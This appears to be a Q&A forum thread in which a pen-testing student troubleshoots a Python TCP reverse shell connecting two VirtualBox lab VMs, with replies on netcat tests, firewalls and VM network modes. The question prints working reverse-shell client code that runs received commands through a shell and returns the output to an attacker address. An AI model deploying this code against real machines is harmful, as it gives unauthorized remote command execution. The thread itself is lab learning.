0

I'm very new to socket, and am currently taking an online course for offensive pen tests. One of the lessons is TCP Reverse shells. I am running two scripts on separate virtual machines (using VirtualBox), one being the attacker and another being the target. The attacker script is running just fine, however the client is outputting the error:

Traceback (most recent call last):
   File "C:\Users\Home\Desktop\TCP_RevShell.py", line 22 in <module> main()
   File "C:\Users\Home\Desktop\TCP_RevShell.py", line 21, in main connect()
   File "C:\Users\Home\Desktop\TCP_RevShell.py", line 6, in connect 
      s.connect(('10.0.2.15', 8080))
   File "C:\Python27\lib\socket.py", line 228, in meth return getattr(self._sock,name) (*args)
error: [Errno 10061] No connection could be made because the target machine actively refused it

And my code:

import socket
import subprocess

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.15', 8080))

    while True:
        command = s.recv(1024)

        if 'terminate' in command:
            s.close()
            break
        else:

            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send(CMD.stdout.read())
            s.send(CMD.stdout.read())

def main():
    connect()
main()

I don't know if you need to see the other script to answer my question, if so, please tell me. Any help would be greatly appreciated, ~Spiralio.

Spiralio
  • 361
  • 1
  • 4
  • 15

1 Answers1

0

Make sure you can ping between the virtual machines. If so, try something simple like a netcat listener and attempt to connect to that.

You can run nc -lp 8080 on the attacker and then nc 10.0.2.15 8080 on the victim (assuming you're on Linux).

Those two steps will help you isolate the issue. If ping doesn't work, most likely your network isn't properly configured. Failing netcat points more towards a firewall of some sort. From a quick glance and knowing nothing more about your setup, I'd assume your Python script is fine and that you don't have the 2 VMs properly configured to communicate.

Make sure the IP networks are the same, they are on the same VM network (set in Virtualbox settings), and like mentioned above that there are no firewalls running.

Danny Flack
  • 126
  • 6
  • The attacker is on linux, whilst the target is on windows. Is there any alternative? Thanks for the response :) – Spiralio Sep 09 '17 at 05:37
  • Yep! Ping still works. You can do some magic with Powershell to replace nc?.. Or, since your already learning pen testing and such, just install https://eternallybored.org/misc/netcat/ on Windows and use that. – Danny Flack Sep 09 '17 at 05:40
  • Thanks, trying that now! – Spiralio Sep 09 '17 at 05:49
  • Ok, so I used the 'ping' command on both sides, and they both returned with a 0% loss. Unless I'm missing something, it seems to be working properly... Are there any other tests that I should run? – Spiralio Sep 09 '17 at 05:58
  • Yeah, I'd agree that it is. Other than the nc, make sure you turn off Windows Firewall for all domains – Danny Flack Sep 09 '17 at 06:00
  • Should I post the attacker's code? Maybe that would help. – Spiralio Sep 09 '17 at 06:01
  • The firewall is turned off on both vms – Spiralio Sep 09 '17 at 06:02
  • Yeah, go ahead. – Danny Flack Sep 09 '17 at 06:03
  • Sorry, can't comment above yet. Try changing the IP on the attacker side from 10.0.2.15 to 0.0.0.0 or just use the empty string. – Danny Flack Sep 09 '17 at 06:24
  • Same error on victim's side, nothing appears on attacker. – Spiralio Sep 09 '17 at 06:44
  • The only thing I can think of now is to just make sure your IP addresses are right? I tested the scripts here, they both worked for me. Probably no hidden firewalls because you're getting 'actively refused'. Also, you're running the attacker before the victim right? – Danny Flack Sep 09 '17 at 06:51
  • It's really nice to know that the scripts all work, meaning that the course hasn't lied to me... I'll run down all the possible solutions one last time tomorrow. I don't know what network settings I should use... Thanks for the feedback. And yes. – Spiralio Sep 09 '17 at 07:03
  • Okay, glad to help the best I can. Oh yeah, and on line 6 of the victim, remove the `s =`. It should just be `s.connect()` with no assignment. Everything else was good. Here's an article to help with networking: https://www.hackingloops.com/kali-linux-virtualbox-pentest-lab/ – Danny Flack Sep 09 '17 at 07:04
  • That was a typo on the site, my bad. My code does not have s = s.connect in it – Spiralio Sep 09 '17 at 16:57
  • Perfect, did some quick checking. What network mode are your VM's in? You can find that under VM Settings -> Networking -> Attached To: – Danny Flack Sep 09 '17 at 17:30
  • It's set to NAT – Spiralio Sep 09 '17 at 22:45
  • Ok, that could be the issue. Virtualbox usually prohibits incoming connections of any sort in NAT mode. Change the interface to internal network on both VMs and make sure the names are the same. – Danny Flack Sep 09 '17 at 23:36
  • Ok, I'll try that. – Spiralio Sep 10 '17 at 06:05
  • Now that I've changed it, a new error message shows: error: "[Errno 10051] A socket operation was attempted to an unreachable network" – Spiralio Sep 10 '17 at 15:45
  • Yeah, your VMs probably don't have proper IP addresses now, when NAT was turned off so was DHCP. Make you've manually set up the IP address, network, and subnet on each machine. Then use the ping test to ping each VM from the other one and make sure they can reach each other. – Danny Flack Sep 10 '17 at 16:30
  • What should I set those to? The same thing on both VMs? Any article that can help me with that? – Spiralio Sep 11 '17 at 01:46
  • There are a lot of networking articles. It's mostly up to you. I'd say you should set your network to 10.10.10.0/24 or something like that. So, from there set both VMs network and subnets to 10.10.10.0 and 255.255.255.0. As for IP, set the victim to 10.10.10.1 and the attacker to 10.10.10.2. You can change that up but, anything will work so long as it's valid. – Danny Flack Sep 11 '17 at 03:36